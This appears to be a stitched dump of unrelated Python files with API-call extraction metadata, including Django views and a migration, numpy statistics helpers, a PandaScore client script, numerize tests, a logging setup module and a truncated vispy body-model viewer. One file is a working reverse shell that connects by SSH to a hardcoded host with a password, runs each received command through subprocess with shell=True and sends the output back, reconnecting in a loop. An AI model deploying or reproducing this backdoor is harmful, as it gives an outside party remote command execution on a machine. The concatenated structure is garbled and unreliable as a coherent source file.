form_class = AccessForm
template_name = 'access/edit.html'
success_message = '%(field)s - editado com sucesso'
success_url = reverse_lazy('access_index')
def get_context_data(self, **kwargs):
context = super(AccessUpdateView, self).get_context_data(**kwargs)
context['page_name'] = 'Acessos'
context['menu_access'] = 'active'
return context
def form_valid(self, form):
self.object = form.save()
self.object.isUpdatedManual = True
plate = self.object.plate
vehicle = self.object.vehicle
if (vehicle and int(vehicle.pk) > 0) and not plate:
plate = vehicle.plate
self.object.plate = plate.upper()
self.object.save()
return super(AccessUpdateView, self).form_valid(form)
def get_success_message(self, cleaned_data):
return self.success_message % dict(
field=self.object.plate,
)
|
[
"accessApp.repository.VehicleRepository.get_query_filter",
"accessApp.repository.AccessRepository.get_context_today",
"accessApp.repository.AccessRepository.get_query_filter",
"steller.prints.printPdf",
"accessApp.repository.VehicleRepository.get_context",
"django.urls.reverse_lazy",
"steller.exports.exportXlsx",
"accessApp.repository.AccessRepository.get_query_today",
"accessApp.repository.VehicleRepository.get_query_filter_export",
"accessApp.repository.AccessRepository.get_context_not_exit",
"accessApp.repository.AccessRepository.get_context",
"django.contrib.messages.success",
"accessApp.repository.AccessRepository.get_query_not_exit",
"datetime.datetime.now",
"accessApp.repository.AccessRepository.get_query_export"
] |
[((1382, 1432), 'accessApp.repository.VehicleRepository.get_query_filter_export', 'VehicleRepository.get_query_filter_export', (['request'], {}), '(request)\n', (1423, 1432), False, 'from accessApp.repository import VehicleRepository\n'), ((1495, 1541), 'steller.exports.exportXlsx', 'exportXlsx', (['model', 'filename', 'queryset', 'columns'], {}), '(model, filename, queryset, columns)\n', (1505, 1541), False, 'from steller.exports import exportXlsx\n'), ((1624, 1667), 'accessApp.repository.VehicleRepository.get_query_filter', 'VehicleRepository.get_query_filter', (['request'], {}), '(request)\n', (1658, 1667), False, 'from accessApp.repository import VehicleRepository\n'), ((1749, 1796), 'steller.prints.printPdf', 'printPdf', (['request', 'filename', 'queryset', 'template'], {}), '(request, filename, queryset, template)\n', (1757, 1796), False, 'from steller.prints import printPdf\n'), ((2113, 2142), 'django.urls.reverse_lazy', 'reverse_lazy', (['"""vehicle_index"""'], {}), "('vehicle_index')\n", (2125, 2142), False, 'from django.urls import reverse_lazy\n'), ((3096, 3125), 'django.urls.reverse_lazy', 'reverse_lazy', (['"""vehicle_index"""'], {}), "('vehicle_index')\n", (3108, 3125), False, 'from django.urls import reverse_lazy\n'), ((3757, 3786), 'django.urls.reverse_lazy', 'reverse_lazy', (['"""vehicle_index"""'], {}), "('vehicle_index')\n", (3769, 3786), False, 'from django.urls import reverse_lazy\n'), ((5449, 5491), 'accessApp.repository.AccessRepository.get_query_export', 'AccessRepository.get_query_export', (['request'], {}), '(request)\n', (5482, 5491), False, 'from accessApp.repository import AccessRepository\n'), ((5564, 5610), 'steller.exports.exportXlsx', 'exportXlsx', (['model', 'filename', 'queryset', 'columns'], {}), '(model, filename, queryset, columns)\n', (5574, 5610), False, 'from steller.exports import exportXlsx\n'), ((5691, 5733), 'accessApp.repository.AccessRepository.get_query_filter', 'AccessRepository.get_query_filter', (['request'], {}), '(request)\n', (5724, 5733), False, 'from accessApp.repository import AccessRepository\n'), ((5813, 5860), 'steller.prints.printPdf', 'printPdf', (['request', 'filename', 'queryset', 'template'], {}), '(request, filename, queryset, template)\n', (5821, 5860), False, 'from steller.prints import printPdf\n'), ((6181, 6209), 'django.urls.reverse_lazy', 'reverse_lazy', (['"""access_index"""'], {}), "('access_index')\n", (6193, 6209), False, 'from django.urls import reverse_lazy\n'), ((7451, 7479), 'django.urls.reverse_lazy', 'reverse_lazy', (['"""access_index"""'], {}), "('access_index')\n", (7463, 7479), False, 'from django.urls import reverse_lazy\n'), ((1046, 1094), 'accessApp.repository.VehicleRepository.get_query_filter', 'VehicleRepository.get_query_filter', (['self.request'], {}), '(self.request)\n', (1080, 1094), False, 'from accessApp.repository import VehicleRepository\n'), ((1183, 1235), 'accessApp.repository.VehicleRepository.get_context', 'VehicleRepository.get_context', (['self', 'VehicleListView'], {}), '(self, VehicleListView)\n', (1212, 1235), False, 'from accessApp.repository import VehicleRepository\n'), ((3995, 4047), 'django.contrib.messages.success', 'messages.success', (['self.request', 'self.success_message'], {}), '(self.request, self.success_message)\n', (4011, 4047), False, 'from django.contrib import messages\n'), ((4317, 4364), 'accessApp.repository.AccessRepository.get_query_filter', 'AccessRepository.get_query_filter', (['self.request'], {}), '(self.request)\n', (4350, 4364), False, 'from accessApp.repository import AccessRepository\n'), ((4453, 4503), 'accessApp.repository.AccessRepository.get_context', 'AccessRepository.get_context', (['self', 'AccessListView'], {}), '(self, AccessListView)\n', (4481, 4503), False, 'from accessApp.repository import AccessRepository\n'), ((4716, 4750), 'accessApp.repository.AccessRepository.get_query_today', 'AccessRepository.get_query_today', ([], {}), '()\n', (4748, 4750), False, 'from accessApp.repository import AccessRepository\n'), ((4839, 4900), 'accessApp.repository.AccessRepository.get_context_today', 'AccessRepository.get_context_today', (['self', 'AccessTodayListView'], {}), '(self, AccessTodayListView)\n', (4873, 4900), False, 'from accessApp.repository import AccessRepository\n'), ((5115, 5152), 'accessApp.repository.AccessRepository.get_query_not_exit', 'AccessRepository.get_query_not_exit', ([], {}), '()\n', (5150, 5152), False, 'from accessApp.repository import AccessRepository\n'), ((5241, 5307), 'accessApp.repository.AccessRepository.get_context_not_exit', 'AccessRepository.get_context_not_exit', (['self', 'AccessNotExitListView'], {}), '(self, AccessNotExitListView)\n', (5278, 5307), False, 'from accessApp.repository import AccessRepository\n'), ((7055, 7069), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (7067, 7069), False, 'from datetime import datetime\n')]
|
import numpy as np
import scipy.stats
from functools import partial
from ..util.math import flattengrid
from ..comp.codata import ILR, close
from .log import Handle
logger = Handle(__name__)
def get_scaler(*fs):
"""
Generate a function which will transform columns of an array
based on input functions (e.g. :code:`np.log` will log-transform the x values,
:code:`None, np.log` will log-transform the y values but not the x).
Parameters
------------
fs
A series of functions to apply to subsequent axes of an array.
"""
def scaler(arr, fs=fs):
A = arr.copy()
for ix, f in enumerate(fs):
if f is not None:
A[:, ix] = f(A[:, ix])
return A
return partial(scaler, fs=fs)
def sample_kde(data, samples, renorm=False, transform=lambda x: x, bw_method=None):
"""
Sample a Kernel Density Estimate at points or a grid defined.
Parameters
------------
data : :class:`numpy.ndarray`
Source data to estimate the kernel density estimate; observations should be
in rows (:code:`npoints, ndim`).
samples : :class:`numpy.ndarray`
Coordinates to sample the KDE estimate at (:code:`npoints, ndim`).
transform
Transformation used prior to kernel density estimate.
bw_method : :class:`str`, :class:`float`, callable
Method used to calculate the estimator bandwidth.
See :func:`scipy.stats.kde.gaussian_kde`.
Returns
----------
:class:`numpy.ndarray`
"""
# check shape info first
data = np.atleast_2d(data)
if data.shape[0] == 1: # single row which should be a column
logger.debug("Transposing data row to column format for KDE.")
data = data.T
tdata = transform(data)
tdata = tdata[np.isfinite(tdata).all(axis=1), :] # filter rows with nans
K = scipy.stats.gaussian_kde(tdata.T, bw_method=bw_method)
if isinstance(samples, list) and isinstance(samples[0], np.ndarray): # meshgrid
logger.debug("Sampling with meshgrid.")
zshape = samples[0].shape
ksamples = transform(flattengrid(samples))
else:
zshape = samples.shape[0]
ksamples = transform(samples)
# ensures shape is fine even if row is passed
ksamples = ksamples.reshape(-1, tdata.shape[1])
# samples shouldnt typically contain nans
# ksamples = ksamples[np.isfinite(ksamples).all(axis=1), :]
if not tdata.shape[1] == ksamples.shape[1]:
logger.warn("Dimensions of data and samples do not match.")
zi = K(ksamples.T)
zi = zi.reshape(zshape)
if renorm:
logger.debug("Normalising KDE sample.")
zi = zi / np.nanmax(zi)
return zi
def sample_ternary_kde(data, samples, transform=ILR):
"""
Sample a Kernel Density Estimate in ternary space points or a grid defined by
samples.
Parameters
------------
data : :class:`numpy.ndarray`
Source data to estimate the kernel density estimate (:code:`npoints, ndim`).
samples : :class:`numpy.ndarray`
Coordinates to sample the KDE estimate at (:code:`npoints, ndim`)..
transform
Log-transformation used prior to kernel density estimate.
Returns
----------
:class:`numpy.ndarray`
"""
return sample_kde(data, samples, transform=lambda x: transform(close(x)))
def lognorm_to_norm(mu, s):
"""
Calculate mean and variance for a normal random variable from the lognormal
parameters :code:`mu` and :code:`s`.
Parameters
-----------
mu : :class:`float`
Parameter :code:`mu` for the lognormal distribution.
s : :class:`float`
:code:`sigma` for the lognormal distribution.
Returns
--------
mean : :class:`float`
Mean of the normal distribution.
sigma : :class:`float`
Variance of the normal distribution.
"""
mean = np.exp(mu + 0.5 * s ** 2)
variance = (np.exp(s ** 2) - 1) * np.exp(2 * mu + s ** 2)
return mean, np.sqrt(variance)
def norm_to_lognorm(mean, sigma, exp=True):
"""
Calculate :code:`mu` and :code:`sigma` parameters for a lognormal random variable
with a given mean and variance. Lognormal with parameters
:code:`mean` and :code:`sigma`.
Parameters
-----------
mean : :class:`float`
Mean of the normal distribution.
sigma : :class:`float`
:code:`sigma` of the normal distribution.
exp : :class:`bool`
If using the :mod:`scipy.stats` parameterisation; this uses
:code:`scale = np.exp(mu)`.
Returns
--------
mu : :class:`float`
Parameter :code:`mu` for the lognormal distribution.
s : :class:`float`
:code:`sigma` of the lognormal distribution.
"""
mu = np.log(mean / np.sqrt(1 + sigma ** 2 / (mean ** 2)))
v = np.log(1 + sigma ** 2 / (mean ** 2))
if exp: # scipy parameterisation of lognormal uses scale = np.exp(mu) !
mu = np.exp(mu)
return mu, np.sqrt(v)
|
[
"numpy.atleast_2d",
"functools.partial",
"numpy.log",
"numpy.isfinite",
"numpy.exp",
"numpy.nanmax",
"numpy.sqrt"
] |
[((749, 771), 'functools.partial', 'partial', (['scaler'], {'fs': 'fs'}), '(scaler, fs=fs)\n', (756, 771), False, 'from functools import partial\n'), ((1578, 1597), 'numpy.atleast_2d', 'np.atleast_2d', (['data'], {}), '(data)\n', (1591, 1597), True, 'import numpy as np\n'), ((3903, 3928), 'numpy.exp', 'np.exp', (['(mu + 0.5 * s ** 2)'], {}), '(mu + 0.5 * s ** 2)\n', (3909, 3928), True, 'import numpy as np\n'), ((4833, 4867), 'numpy.log', 'np.log', (['(1 + sigma ** 2 / mean ** 2)'], {}), '(1 + sigma ** 2 / mean ** 2)\n', (4839, 4867), True, 'import numpy as np\n'), ((3967, 3990), 'numpy.exp', 'np.exp', (['(2 * mu + s ** 2)'], {}), '(2 * mu + s ** 2)\n', (3973, 3990), True, 'import numpy as np\n'), ((4008, 4025), 'numpy.sqrt', 'np.sqrt', (['variance'], {}), '(variance)\n', (4015, 4025), True, 'import numpy as np\n'), ((4960, 4970), 'numpy.exp', 'np.exp', (['mu'], {}), '(mu)\n', (4966, 4970), True, 'import numpy as np\n'), ((4986, 4996), 'numpy.sqrt', 'np.sqrt', (['v'], {}), '(v)\n', (4993, 4996), True, 'import numpy as np\n'), ((2692, 2705), 'numpy.nanmax', 'np.nanmax', (['zi'], {}), '(zi)\n', (2701, 2705), True, 'import numpy as np\n'), ((3945, 3959), 'numpy.exp', 'np.exp', (['(s ** 2)'], {}), '(s ** 2)\n', (3951, 3959), True, 'import numpy as np\n'), ((4786, 4821), 'numpy.sqrt', 'np.sqrt', (['(1 + sigma ** 2 / mean ** 2)'], {}), '(1 + sigma ** 2 / mean ** 2)\n', (4793, 4821), True, 'import numpy as np\n'), ((1804, 1822), 'numpy.isfinite', 'np.isfinite', (['tdata'], {}), '(tdata)\n', (1815, 1822), True, 'import numpy as np\n')]
|
# -*- coding: utf-8 -*
import numpy as np
a = np.array([2, 0, 1 ,5])
print(a)
print(a[:3])
print(a.min())
# 由小到大排序
a.sort()
print(a)
# 二维矩阵
b = np.array([[1,2,3], [4,5,6]])
print(b*b)
|
[
"numpy.array"
] |
[((47, 69), 'numpy.array', 'np.array', (['[2, 0, 1, 5]'], {}), '([2, 0, 1, 5])\n', (55, 69), True, 'import numpy as np\n'), ((149, 181), 'numpy.array', 'np.array', (['[[1, 2, 3], [4, 5, 6]]'], {}), '([[1, 2, 3], [4, 5, 6]])\n', (157, 181), True, 'import numpy as np\n')]
|
import PandaScore
import Processing
from settings import CONFIG, SECRETS
from data import DATA
# def main():
# ps = PandaScore.PandaScoreAPIClient(SECRETS.PS_API_KEY, CONFIG.PS_CONFIG)
# series = ps.get_running_series()
#
# html = Processing.generate_html_from_series(series)
#
# return html
def main():
ps = PandaScore.PandaScoreAPIClient(SECRETS.PS_API_KEY, CONFIG.PS_CONFIG)
leagues_by_videogame = {}
for requested_game in CONFIG.GAMES_CONFIG:
try:
g = DATA.GAMES.find_id(requested_game)
except ValueError as e:
print(e)
try:
g = DATA.GAMES.find_name(requested_game)
except ValueError as e:
print(e)
try:
g = DATA.GAMES.find_slug(requested_game)
except ValueError as e:
print(e)
if not g:
raise ValueError(f"Could not find game {requested_game}")
id = g["id"]
leagues_by_videogame[id] = ps.get_leagues_by_game_id_slug(id)
html = Processing.generate_html_from_leagues_by_vg(leagues_by_videogame)
return html
|
[
"data.DATA.GAMES.find_id",
"Processing.generate_html_from_leagues_by_vg",
"data.DATA.GAMES.find_slug",
"PandaScore.PandaScoreAPIClient",
"data.DATA.GAMES.find_name"
] |
[((333, 401), 'PandaScore.PandaScoreAPIClient', 'PandaScore.PandaScoreAPIClient', (['SECRETS.PS_API_KEY', 'CONFIG.PS_CONFIG'], {}), '(SECRETS.PS_API_KEY, CONFIG.PS_CONFIG)\n', (363, 401), False, 'import PandaScore\n'), ((1043, 1108), 'Processing.generate_html_from_leagues_by_vg', 'Processing.generate_html_from_leagues_by_vg', (['leagues_by_videogame'], {}), '(leagues_by_videogame)\n', (1086, 1108), False, 'import Processing\n'), ((510, 544), 'data.DATA.GAMES.find_id', 'DATA.GAMES.find_id', (['requested_game'], {}), '(requested_game)\n', (528, 544), False, 'from data import DATA\n'), ((628, 664), 'data.DATA.GAMES.find_name', 'DATA.GAMES.find_name', (['requested_game'], {}), '(requested_game)\n', (648, 664), False, 'from data import DATA\n'), ((748, 784), 'data.DATA.GAMES.find_slug', 'DATA.GAMES.find_slug', (['requested_game'], {}), '(requested_game)\n', (768, 784), False, 'from data import DATA\n')]
|
import unittest
from numerize import numerize
class TestNumerizeFunc(unittest.TestCase):
def test_numerize(self):
self.assertEqual(numerize(1), "1")
self.assertEqual(numerize(10), "10")
def test_thousand(self):
self.assertEqual(numerize(1000), "1K")
def test_strict(self):
self.assertEqual(numerize(999), "999")
self.assertEqual(numerize(9999), "10.00K")
def test_negative(self):
self.assertEqual(numerize(-1), "-1")
self.assertEqual(numerize(-10), "-10")
self.assertEqual(numerize(-1000), "-1K")
self.assertEqual(numerize(-9999,4), "-9.9990K")
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main",
"numerize.numerize"
] |
[((666, 681), 'unittest.main', 'unittest.main', ([], {}), '()\n', (679, 681), False, 'import unittest\n'), ((143, 154), 'numerize.numerize', 'numerize', (['(1)'], {}), '(1)\n', (151, 154), False, 'from numerize import numerize\n'), ((186, 198), 'numerize.numerize', 'numerize', (['(10)'], {}), '(10)\n', (194, 198), False, 'from numerize import numerize\n'), ((260, 274), 'numerize.numerize', 'numerize', (['(1000)'], {}), '(1000)\n', (268, 274), False, 'from numerize import numerize\n'), ((334, 347), 'numerize.numerize', 'numerize', (['(999)'], {}), '(999)\n', (342, 347), False, 'from numerize import numerize\n'), ((381, 395), 'numerize.numerize', 'numerize', (['(9999)'], {}), '(9999)\n', (389, 395), False, 'from numerize import numerize\n'), ((462, 474), 'numerize.numerize', 'numerize', (['(-1)'], {}), '(-1)\n', (470, 474), False, 'from numerize import numerize\n'), ((507, 520), 'numerize.numerize', 'numerize', (['(-10)'], {}), '(-10)\n', (515, 520), False, 'from numerize import numerize\n'), ((554, 569), 'numerize.numerize', 'numerize', (['(-1000)'], {}), '(-1000)\n', (562, 569), False, 'from numerize import numerize\n'), ((603, 621), 'numerize.numerize', 'numerize', (['(-9999)', '(4)'], {}), '(-9999, 4)\n', (611, 621), False, 'from numerize import numerize\n')]
|
# Generated by Django 2.2.7 on 2020-06-20 04:09
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('usermgmt', '0013_profile_tags'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='tags',
field=models.ManyToManyField(blank=True, related_name='fav_tags', to='idea.Tag'),
),
]
|
[
"django.db.models.ManyToManyField"
] |
[((330, 404), 'django.db.models.ManyToManyField', 'models.ManyToManyField', ([], {'blank': '(True)', 'related_name': '"""fav_tags"""', 'to': '"""idea.Tag"""'}), "(blank=True, related_name='fav_tags', to='idea.Tag')\n", (352, 404), False, 'from django.db import migrations, models\n')]
|
"""
Rival Regions Wrapper
This unofficial API wrapper is an implementation
of some Rival Regions functionalities.
"""
import logging
import pathlib2
from appdirs import user_data_dir
DATA_DIR = user_data_dir("rival_regions_wrapper", "bergc")
pathlib2.Path(DATA_DIR).mkdir(parents=True, exist_ok=True)
# get logger
LOGGER = logging.getLogger(__name__)
LOGGER.setLevel(logging.DEBUG)
# create file handler
FILE_HANDLER = logging.FileHandler("{}/output.log".format(DATA_DIR))
FILE_HANDLER.setLevel(logging.DEBUG)
# create console handler
STREAM_HANDLER = logging.StreamHandler()
STREAM_HANDLER.setLevel(logging.INFO)
# create formatter and add it to the handlers
STREAM_FORMATTER = logging.Formatter(
"%(name)s - %(module)s - %(levelname)s - %(message)s"
)
STREAM_HANDLER.setFormatter(STREAM_FORMATTER)
FILE_FORMATTER = logging.Formatter(
"%(asctime)s - %(name)s - %(module)s - %(levelname)s - %(message)s"
)
FILE_HANDLER.setFormatter(FILE_FORMATTER)
# add the handlers to logger
LOGGER.addHandler(STREAM_HANDLER)
LOGGER.addHandler(FILE_HANDLER)
# from .authentication_handler import AuthenticationHandler
# from .middleware import LocalAuthentication, RemoteAuthentication
|
[
"appdirs.user_data_dir",
"logging.StreamHandler",
"logging.Formatter",
"pathlib2.Path",
"logging.getLogger"
] |
[((199, 246), 'appdirs.user_data_dir', 'user_data_dir', (['"""rival_regions_wrapper"""', '"""bergc"""'], {}), "('rival_regions_wrapper', 'bergc')\n", (212, 246), False, 'from appdirs import user_data_dir\n'), ((329, 356), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (346, 356), False, 'import logging\n'), ((560, 583), 'logging.StreamHandler', 'logging.StreamHandler', ([], {}), '()\n', (581, 583), False, 'import logging\n'), ((688, 760), 'logging.Formatter', 'logging.Formatter', (['"""%(name)s - %(module)s - %(levelname)s - %(message)s"""'], {}), "('%(name)s - %(module)s - %(levelname)s - %(message)s')\n", (705, 760), False, 'import logging\n'), ((830, 921), 'logging.Formatter', 'logging.Formatter', (['"""%(asctime)s - %(name)s - %(module)s - %(levelname)s - %(message)s"""'], {}), "(\n '%(asctime)s - %(name)s - %(module)s - %(levelname)s - %(message)s')\n", (847, 921), False, 'import logging\n'), ((247, 270), 'pathlib2.Path', 'pathlib2.Path', (['DATA_DIR'], {}), '(DATA_DIR)\n', (260, 270), False, 'import pathlib2\n')]
|
import paramiko
import subprocess
HOST = '10.10.10.10'
USERNAME = 'test'
PASSWORD = '<PASSWORD>'
PORT = 2022
run = True
while run == True:
try:
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(HOST, port=PORT, username=USERNAME, password=PASSWORD, compress=True)
chan = client.get_transport().open_session()
chan.send('Command Shell Open')
while True:
command = chan.recv(1024).decode()
if command == 'exit':
run = False
client.close()
break
elif command == 'reset':
run = True
client.close()
break
else:
try:
process = subprocess.run(command, shell=True, capture_output=True, text=True)
if str(process.stderr).startswith("/bin/sh:"):
chan.send(str(process.stderr))
cmd = ''
elif str(process.stdout) == "" and str(process.stderr) == "":
chan.send('No data returned')
cmd = ''
elif str(process.stdout) == "":
chan.send(str(process.stderr))
cmd = str(process.stderr)
else:
cmd = str(process.stdout)
try:
chan.send(cmd)
except Exception as e:
chan.send(e)
except subprocess.CalledProcessError as e:
chan.send(e)
client.close()
except:
pass
|
[
"paramiko.AutoAddPolicy",
"subprocess.run",
"paramiko.SSHClient"
] |
[((161, 181), 'paramiko.SSHClient', 'paramiko.SSHClient', ([], {}), '()\n', (179, 181), False, 'import paramiko\n'), ((221, 245), 'paramiko.AutoAddPolicy', 'paramiko.AutoAddPolicy', ([], {}), '()\n', (243, 245), False, 'import paramiko\n'), ((719, 786), 'subprocess.run', 'subprocess.run', (['command'], {'shell': '(True)', 'capture_output': '(True)', 'text': '(True)'}), '(command, shell=True, capture_output=True, text=True)\n', (733, 786), False, 'import subprocess\n')]
|
import sys
from collections import defaultdict, Counter
from tqdm import tqdm
import nltk
import json
import os
stopwords_file = "stopwords_en.txt"
if not os.path.exists(stopwords_file):
stopwords_file = "../" + stopwords_file
with open(stopwords_file, "r") as f:
stopwords = [each.strip() for each in f.readlines()]
def process_entity_relations(entity_relations_str, disable=False):
# format is ollie.
entity_relations_str = list(entity_relations_str)
entity_relations = list()
for s in tqdm(entity_relations_str, ascii=True, disable=disable):
temp = s[s.find("(") + 1:s.find(")")].split(';')
entity_relations.append(temp)
return entity_relations
def strip(list_of_strings, stem=False):
stemmer = nltk.stem.porter.PorterStemmer()
if stem:
list_of_strings = [" ".join([stemmer.stem(word) for word in each.strip().split()]) for each in list_of_strings]
else:
list_of_strings = [each.strip().lower() for each in list_of_strings]
# list_of_strings = [stemmer.stem(each) for each in list_of_strings if each not in stopwords]
return list_of_strings
class Graph(object):
def __init__(self, file=None, stem=False, disable=False):
self.adj = defaultdict(lambda: defaultdict(set))
self.source_file = file
if file is not None:
self.build(stem=stem, disable=disable)
def save(self, file):
json.dump(self.adj, open(file, "w"))
def load(self, file):
self.source_file = file
self.adj = json.load(open(file, "r"))
def read(self, stem=False, disable=False):
relations = open(self.source_file, "r").readlines()
if not disable:
print("Converting into list of triplets")
relations = process_entity_relations(relations, disable=disable)
if not disable:
print("Stripping")
relations = [strip(entity_relations, stem) for entity_relations in tqdm(relations, ascii=True, disable=disable)]
return relations
def build(self, stem=False, disable=True):
if not disable:
print("Reading and cleaning relations")
relations = self.read(stem=stem, disable=disable)
if not disable:
print("Building Graph")
for entity_relation in tqdm(relations, disable=disable, ascii=True):
if(len(entity_relation) == 3):
subj = entity_relation[0]
pred = entity_relation[1]
obj = entity_relation[2]
self.adj[subj][obj].add(pred)
self.adj[obj][subj].add("rev_" + pred)
del relations
if not disable:
print("Converting sets of edges to lists")
for subj in tqdm(self.adj, disable=disable, ascii=True):
for obj in self.adj[subj]:
self.adj[subj][obj] = list(self.adj[subj][obj])
if not disable:
print("Graph Building Completed")
def dfs(self, start, visited):
st = []
visited[start] = True
st.append(start)
num_of_members = 1
while(len(st) > 0):
top = st.pop()
for key in self.adj[top]:
if not visited[key]:
visited[key] = True
num_of_members += 1
st.append(key)
return num_of_members
def connectedness(self):
visited = defaultdict(lambda: False)
num = []
for key in self.adj:
if not visited[key]:
num.append(self.dfs(key, visited))
components = list(Counter(num).items())
components.sort(key=lambda x: x[0], reverse=True)
return components
def num_nodes(self):
return len(self.adj)
def num_edges(self):
edge = 0
for node in self.adj:
edge += len(self.adj[node])
return edge / 2
# return score
def __repr__(self):
representation = "Number of Nodes: %d \
\nNumber of Edges: %d \
\nComponents: \
\nNodes\tNumber of components \
""" % (self.num_nodes(), self.num_edges())
components = self.connectedness()
for a, b in components:
representation += "\n%d\t%d" % (a, b)
return representation + "\n"
if __name__ == '__main__':
file = sys.argv[1]
stem = sys.argv[2]
stem = True if stem == "True" else False
print(stem)
g = Graph(file, stem)
print(g.num_nodes())
print(g.num_edges())
print(g.connectedness())
|
[
"tqdm.tqdm",
"collections.Counter",
"os.path.exists",
"collections.defaultdict",
"nltk.stem.porter.PorterStemmer"
] |
[((156, 186), 'os.path.exists', 'os.path.exists', (['stopwords_file'], {}), '(stopwords_file)\n', (170, 186), False, 'import os\n'), ((516, 571), 'tqdm.tqdm', 'tqdm', (['entity_relations_str'], {'ascii': '(True)', 'disable': 'disable'}), '(entity_relations_str, ascii=True, disable=disable)\n', (520, 571), False, 'from tqdm import tqdm\n'), ((752, 784), 'nltk.stem.porter.PorterStemmer', 'nltk.stem.porter.PorterStemmer', ([], {}), '()\n', (782, 784), False, 'import nltk\n'), ((2294, 2338), 'tqdm.tqdm', 'tqdm', (['relations'], {'disable': 'disable', 'ascii': '(True)'}), '(relations, disable=disable, ascii=True)\n', (2298, 2338), False, 'from tqdm import tqdm\n'), ((2732, 2775), 'tqdm.tqdm', 'tqdm', (['self.adj'], {'disable': 'disable', 'ascii': '(True)'}), '(self.adj, disable=disable, ascii=True)\n', (2736, 2775), False, 'from tqdm import tqdm\n'), ((3408, 3435), 'collections.defaultdict', 'defaultdict', (['(lambda : False)'], {}), '(lambda : False)\n', (3419, 3435), False, 'from collections import defaultdict, Counter\n'), ((1254, 1270), 'collections.defaultdict', 'defaultdict', (['set'], {}), '(set)\n', (1265, 1270), False, 'from collections import defaultdict, Counter\n'), ((1950, 1994), 'tqdm.tqdm', 'tqdm', (['relations'], {'ascii': '(True)', 'disable': 'disable'}), '(relations, ascii=True, disable=disable)\n', (1954, 1994), False, 'from tqdm import tqdm\n'), ((3591, 3603), 'collections.Counter', 'Counter', (['num'], {}), '(num)\n', (3598, 3603), False, 'from collections import defaultdict, Counter\n')]
|
import sys
from vispy import scene
from vispy.scene import SceneCanvas
from vispy.visuals import transforms
from PyQt5 import QtWidgets, QtCore
from PyQt5.QtCore import *
from PyQt5.QtWidgets import QMainWindow, QWidget, QLabel, QGridLayout, QPushButton, QCheckBox, QSlider
#from MyWidget import *
from vispy import io
#from vispy.visuals.filters import Alpha
from vispy.visuals.transforms import STTransform, MatrixTransform, ChainTransform
import numpy as np
from xml.dom.minidom import parse
import pickle
import random
from bvh import Bvh
import trimesh #
from util import *
from myMath import *
#scaleMatDict=pickle.load(open('personalAdjustmentMatrix.pkl','rb'))
personalDict=pickle.load(open('output/personalDict.pkl','rb'))
scaleMatDict=personalDict['scaleMatDict']
headH_headM_personal=personalDict['headH_headM_personal']
######################################################
dataFolder='template/'
objPath=dataFolder+'OBJ/'
#bvhPath=dataFolder+'motion/'
######################################################
appQt = QtWidgets.QApplication(sys.argv)
win = QMainWindow()
win.resize(700, 500)
win.setWindowTitle('Component Tester')
canvas=SceneCanvas()
canvas.create_native()
canvas.native.setParent(win)
canvas.unfreeze()
view=canvas.central_widget.add_view() #add view to the canvas
view.camera='turntable'
view.camera.up='+y'
canvas.freeze()
#transparent surface must come last (order is important)
originAxis=scene.visuals.XYZAxis(parent=view.scene) #axis length=1
print(originAxis.pos)
################ marker set ####################
#markerDict={}
#f=open(objPath+'markerVertex.txt','r')
#markerCount=0
#for line in f.readlines():
# markerName,objName,vertexIndex=line.strip().split(' ')
# objName=objName+'.obj'
# vertexIndex=int(vertexIndex)
# if objName not in markerDict:
# markerDict[objName]=[]
#
# markerDict[objName].append((vertexIndex,markerName,))
# markerCount+=1
#
#f.close()
#print(markerDict.keys())
######################################################
human = parse(dataFolder+"human.xml")
nodes=human.getElementsByTagName('Node')
humanJointPositionList=[]
boxCenterList=[]
for aNode in nodes:
name=aNode.getAttribute('name')
parent=aNode.getAttribute('parent')
body=aNode.getElementsByTagName('Body')[0]
joint=aNode.getElementsByTagName('Joint')[0]
#print(name,parent,body,joint) #ok
mass=body.getAttribute('mass')
size=floatList(body.getAttribute('size')) #*
size*=np.diag(scaleMatDict[name])[:3]
#print(size)
contact=body.getAttribute('contact') #Off or On
obj=body.getAttribute('obj')
bodyT=getTransformationXML(body) #*
jointT=getTransformationXML(joint) #*
#boxCenterList.append(bodyT[0:3,3])
#humanJointPositionList.append(jointT[0:3,3])
modBoxCenter=(scaleMatDict[name]@bodyT[:,3:4])[0:3,0]
bodyT[:3,3]=modBoxCenter
#bodyT rotation should be adjusted a little bit too
#but keeping orientation the same should not be that bad
boxCenterList.append(modBoxCenter)
humanJointPositionList.append((scaleMatDict[name]@jointT[:,3:4])[0:3,0])
#print(bodyT) #ok
#print(jointT) #ok
verts, faces, normals, nothin = io.read_mesh(objPath+obj) #verts preserve the number of vertex but the order is not preserved
verts*=0.01
vertexMod = scaleMatDict[name] @ np.vstack([verts.transpose(),np.ones([1,verts.shape[0]])]) #(4,n)
verts = vertexMod[:3,:].transpose()
objMesh = scene.visuals.Mesh(parent=view.scene,vertices=verts, shading='flat', faces=faces,color=(0.8, 0.8, 0.8,0.2)) #'flat' is much faster than 'smooth', None removes lighting
objMesh.set_gl_state('translucent', cull_face=False,depth_test=False)
aBox=scene.visuals.Box(parent=view.scene,width=size[0],depth=size[1],height=size[2],color=(0.8,0.1,0.1,0.2))
aBox.transform=MatrixTransform(bodyT.transpose()) #transpose to match openGL format
aBox.set_gl_state('translucent', cull_face=False,depth_test=False)
#if(obj in markerDict):
# v=trimesh.load(objPath+obj, process=False).vertices #use this library because it preserve the order of vertex
# v*=0.01
# for tup in markerDict[obj]:
# vertexIndex,markerName=tup #markerDict[obj][i]
# markerPosition.append(v[vertexIndex,:])
# print(obj,markerName,vertexIndex,v[vertexIndex,:])
#else:
# print(obj)
humanJointPositionList=np.stack(humanJointPositionList)
humanJointMarker=scene.visuals.Markers(parent=view.scene,size=8,pos=humanJointPositionList,face_color='green')
humanJointMarker.set_gl_state('translucent', cull_face=False,depth_test=False)
boxCenterList=np.stack(boxCenterList)
boxCenterMarker=scene.visuals.Markers(parent=view.scene,size=8,pos=boxCenterList,face_color='red')
boxCenterMarker.set_gl_state('translucent', cull_face=False,depth_test=False)
###################### marker position ######################
'''
markerPosition=[] #np.zeros([markerCount,3]) #global frame
finalMarkerDict=pickle.load(open(dataFolder+"markerPosition.pkl",'rb')) #processed from 01 genTemplateMarkerPosition
for markerName in finalMarkerDict:
